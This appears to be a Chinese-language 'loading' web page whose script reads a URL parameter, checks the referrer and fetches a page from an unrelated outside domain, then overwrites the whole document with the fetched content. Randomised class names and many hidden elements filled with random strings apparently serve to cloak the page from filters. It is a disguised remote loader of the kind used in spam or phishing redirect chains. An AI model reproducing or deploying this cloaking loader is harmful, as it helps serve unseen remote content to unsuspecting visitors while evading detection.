<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .IkNHfMvF6 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .IkNHfMvF6 .UI1xSjL {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .IkNHfMvF6 .content {
            line-height: 50px;
            text-align: center
        }

        .IkNHfMvF6 .img {
            width: 100%
        }

        .IkNHfMvF6 .FzHBGMsnC {
            text-align: center
        }

        .IkNHfMvF6 .FzHBGMsnC span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .IkNHfMvF6 .FzHBGMsnC span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .IkNHfMvF6 .FzHBGMsnC span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .IkNHfMvF6 .FzHBGMsnC span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .IkNHfMvF6 .FzHBGMsnC span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .IkNHfMvF6 .FzHBGMsnC span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .IkNHfMvF6 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function nWBfg7DxPK6h(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var OOxHy4C = nWBfg7DxPK6h('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ OOxHy4C +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ OOxHy4C +".html?a=share";
		}
		
        CDOH4O=url+"#"+new Date().getTime();
        CDOH4O && function() {
            $.get(CDOH4O, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>XjRbgSKYL0fuRxybvQ3vtPil9aVTXbw</div>
<b style='display:none' >HTAwWZOXO2m18SitxoL7wo7I2iNx3mZjgaxm8nMyeoC6YYN6s6RPrykVDCl</b>
<a  href='#' style='display:none'>TvGCyj0R3q3vTrvTi1JS18KNGBGAzVmKPJsofSbQaiMd6jwZW7BFGaY9vOXS2CfG2jgqeTjHShijtbAsxag</a>
<span style='display:none'>rMSwuzOi1QnMhVCR6TzmknoXcn88EyzikafpTyio9Z4yNVJZYHIorfHq39acsEbD4</span>
<a  href='#' style='display:none'>TvGCyj0R3q3vTrvTi1JS18KNGBGAzVmKPJsofSbQaiMd6jwZW7BFGaY9vOXS2CfG2jgqeTjHShijtbAsxag</a>
<a  href='#' style='display:none'>TvGCyj0R3q3vTrvTi1JS18KNGBGAzVmKPJsofSbQaiMd6jwZW7BFGaY9vOXS2CfG2jgqeTjHShijtbAsxag</a>
<b style='display:none' >HTAwWZOXO2m18SitxoL7wo7I2iNx3mZjgaxm8nMyeoC6YYN6s6RPrykVDCl</b>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>TvGCyj0R3q3vTrvTi1JS18KNGBGAzVmKPJsofSbQaiMd6jwZW7BFGaY9vOXS2CfG2jgqeTjHShijtbAsxag</a><div class="IkNHfMvF6">
    <div class="UI1xSjL">
        <div class="FzHBGMsnC">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>yA9CI6sZ8wPWUVfEeU5voix4HYnrgifPZL1BlKNYyK8Pwn6pc</a>
<p  style='display:none'>KTLFXbZ9O3muOwq8lTxXxfwQwvn8f8I1vzcZokT4</p>
<h1 style='display:none' >mFAzubh8bHid435jrp2l7EOG0cnoVWvXVqHB</h1>
<div style='display:none'>qym3kZIpVMg89JdDpEmULZkws16PRkLve1LZLdFvjopsjISUshXHd1A5cbR3WeerXi6vUGuQHbylCpyhmFv0</div>
<img  src='' style='display:none'>
<div style='display:none'>qym3kZIpVMg89JdDpEmULZkws16PRkLve1LZLdFvjopsjISUshXHd1A5cbR3WeerXi6vUGuQHbylCpyhmFv0</div>
<span style='display:none'>UWjHPTxb3UdWD5E5Y2JxalRV6IkRE</span>
<div style='display:none'>qym3kZIpVMg89JdDpEmULZkws16PRkLve1LZLdFvjopsjISUshXHd1A5cbR3WeerXi6vUGuQHbylCpyhmFv0</div>
<div style='display:none'>qym3kZIpVMg89JdDpEmULZkws16PRkLve1LZLdFvjopsjISUshXHd1A5cbR3WeerXi6vUGuQHbylCpyhmFv0</div></body>
</html>